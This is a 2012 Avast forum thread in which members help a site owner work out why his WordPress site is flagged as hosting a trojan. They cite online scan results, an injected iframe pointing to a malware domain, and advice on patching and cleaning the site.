Avast WEBforum
Other => Viruses and worms => Topic started by: mlapage on January 20, 2012, 12:18:08 AM
-
I have a website wxw.msolarpro.com. When I go to the site I get avast! Web Shield blocked trojan horse message. I Google'd the trojan and didn't find out how to eradicate it. What caused it? Is it a false positive from Web Shield?
Any help here?
Thanks,
Mike
-
Sucuri - INFECTED -http://sitecheck.sucuri.net/results/www.msolarpro.com
VirusTotal URL scan
https://www.virustotal.com/url/b417c30323119157b1261a38567c6b62c55941dd22dade7bc984be07d0f1068e/analysis/1327015879/
Wepawet - Suspicious
http://wepawet.iseclab.org/view.php?hash=fc212bf7576cae45a08415e6b278b2e8&t=1327015872&type=js
UrlQuery - suspicious
http://urlquery.net/report.php?id=16826
-
@ Pondus
When clicking your URL for -www.msolarpro.com results by Sucuri, Avast gives an alert for a blocked trojan. Check it out.
Sucuri - INFECTED -http://sitecheck.sucuri.net/results/www.msolarpro.com
Regards.
-
I see we are going to have to exercise care in giving links to the results in sucuri.net as the web shield has just alerted on that set of results. As presumably the example of the actual script, document . write gives the web shield a fit.
So you will have to break the link.
-
I have a website www.msolarpro.com. When I go to the site I get avast! Web Shield blocked trojan horse message. I Google'd the trojan and didn't find out how to eradicate it. What caused it? Is it a false positive from Web Shield?
Any help here?
Thanks,
Mike
btw its does have a Trojan in it i went to the link and gdata found the Trojan so the site haves a Trojan in it
-
virustotal - 9/41
https://www.virustotal.com/file/a90e49446b4b843b4452860d7f5e421e0c5e9c5c155265c049f96ef9fe44a19d/analysis/1327025796/
-
@ DavidR
I see we are going to have to exercise care in giving links to the results in sucuri.net as the web shield has just alerted on that set of results.
No sheat ! It realy gave me a scare. First time though. Hope I am safe. What do you think it happened ?
-
avast shield reacted on the code displayed at Sucuri ;)
it also happens here in the forum if somone poste code that avast detect
see attached screenshot
-
@ DavidR
I see we are going to have to exercise care in giving links to the results in sucuri.net as the web shield has just alerted on that set of results.
No sheat ! It realy gave me a scare. First time though. Hope I am safe. What do you think it happened ?
I said what I believe happened, sucuri displays the code extracted from the suspect site and the web shield detects it in the same way it would on the original site.
This happens when you are using some analysis sites that give more information on what is found is a copy of what is on the site. I have a number of exclusions for some analysis sites.
It is just that in the past sucuri didn't display the page link to the results so we had to post an image of the information. Now that it does those visiting the results page could well get a shock.
So I think it is back to images.
-
OK.
I said what I believe happened, sucuri displays the code extracted from the suspect site and the web shield detects it in the same way it would on the original site.
I got it now. Your UK English messes my US English learned as a second language. Thanks.
Back to mlapage. Sorry guy for the momentary hijacking.
-
Norman lab
Files:
-www.msolarpro.com.htm : Clean!
l10n.js : Clean!
These are the clean files, but we do get 'iframe' of 'brunno.cz.cc' but this is a inactive link now. so marking as a clean.
-
The norman attitude is strange to me as the site in itself has been hacked (wordpress files, don't know if it is an old vulnerable version being exploited). Regardless if the remote source is up at the time it is checked, as there is nothing to stop the remote site becoming active.
-
Well this is flagged as supicious by avast as JS:ScriptDC-inf[Trj] for the jsunpack analysis
of mentioned site:
-www.msolarpro.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.2 suspicious
[suspicious:2] (ipaddr:184.154.88.218) (script) -www.msolarpro.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.2
status: (referer=-www.msolarpro.com/)saved 386 bytes 8312b9b0c984c54fbc8feaf66bcb4b1dd3acaf58
info: [decodingLevel=0] found JavaScript
Avast webshield flags -www.msolarpro.com/wp-includes/js/l10n.js?ver=20101110
But to Pondus, also have a look here for a second op: http://forum.avast.com/index.php?action=printpage;topic=83287.0 where a false positive was found....and the IP also had an instance of HTML/Redirector.MA on it (now dead),
Also consider this VT scan: https://www.virustotal.com/url/b417c30323119157b1261a38567c6b62c55941dd22dade7bc984be07d0f1068e/analysis/1327015879/ (detection from Bitdefender, but TrafficLight does not list it)
Now we can finally come to the point why the avast webshield blocks this, re: http://wepawet.iseclab.org/view.php?hash=be10484672ca0c3fdf9004f67f05cc13&t=1327101730&type=js
The iFrame source found there: -http://brunno.cz.cc
has malcious activity, found here, see:
http://google.com/safebrowsing/diagnostic?site=brunno.cz.cc/&hl=ru-RU
brunno.cz.cc this site has infected 76 domains as we read there
via -/showthread.php?t=37220338 on it!
We can conclude that the dents of the avast web shield really dig that deep, my good forum friends, as I have explained and demonstrated above in my explanation of the website scan analysis, Yes, I repeat this again - the avast webshield, notwithstanding the status of the exploit found, is an awesome and formidable protection tool,
polonus
-
@DavidR,
I think the avast point of vieuw is the right one here. As long as the website code stays exploitable, software is not fully patched, reinfection stays an imminent threat.
As long as the webclient can no longer be infected, we could conclude the block could be lifted.
So norman says malcode no longer up or responding, site safe to be visited by user.
This attitude towards the issue is rounding the bends by a mile, so to say.
Better is to lift website blocking when the website is secure for both user and website owner/ website hoster/ webmaster. The software code has been fully patched, exploit code cleansed, all measures have been taken to prevent re-infection. One such an action which could be that easy as no longer giving away the full server software version, etc.
polonus
-
I thank you all for the help you have provided. I read the replies, however I did not understand all of what was discussed. Does '/sitecheck.sucuri.net/results/' clean the infected code or just inform to the infection?
Where does my wesite stand at this time-as far as avast program is concerned?
Thanks again,
Mike
-
Sucuri does NOT clean the infected code UNLESS you pay for it.
If you can edit your source code, search for the malcode provided in the
previous image provided by Pondus and delete it.
-
Hi mlapage,
I do not get an avast alert now. This still could be patched: -www.msolarpro.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.2 suspicious
[suspicious:2] (ipaddr:184.154.88.218) -www.msolarpro.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.2
status: (referer=-www.google.com/trends/hottrends)saved 16949 bytes 91588590e403cf96232b117e04289bbc21b898be
info: [script] -www.msolarpro.com/wp-includes/js/jquery/jquery.js?ver=1.7.1
info: [script] -www.msolarpro.com/wp-content/plugins/brainhost-plugin/script.js?ver=1.0
info: [script] -www.brainhost.com/ads/ad.js?size=300x250
info: [script] -www.brainhost.com/ads/ad.js?size=120x600
info: [script] -www.msolarpro.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20111117
info: [decodingLevel=0] found JavaScript
suspicious: maxruntime exceeded 10 seconds (incomplete) 0 bytes
info
No particulars now here: http://wepawet.iseclab.org/view.php?hash=fc212bf7576cae45a08415e6b278b2e8&t=1327169129&type=js
polonus
-
In its results it is only showing what it considers infected/suspect it won't clean it as that in itself would be hacking if someone could ask it to check the site out and that resulted in changes unknown to the owner.
Any cleaning is down to the site owner, it does however offer service plans to clean up sites, I have never used any of their services though. The one site clean-up premium service plan does seem reasonably good value though http://sucuri.net/signup (http://sucuri.net/signup).
####
I don't get an alert visiting your site using firefox 9.0.1.
So it would appear that something has been updated/cleaned up in regard of the wordpress files as sucuri no longer flags it as infected, see image.
Looks like you don't have to do anything else.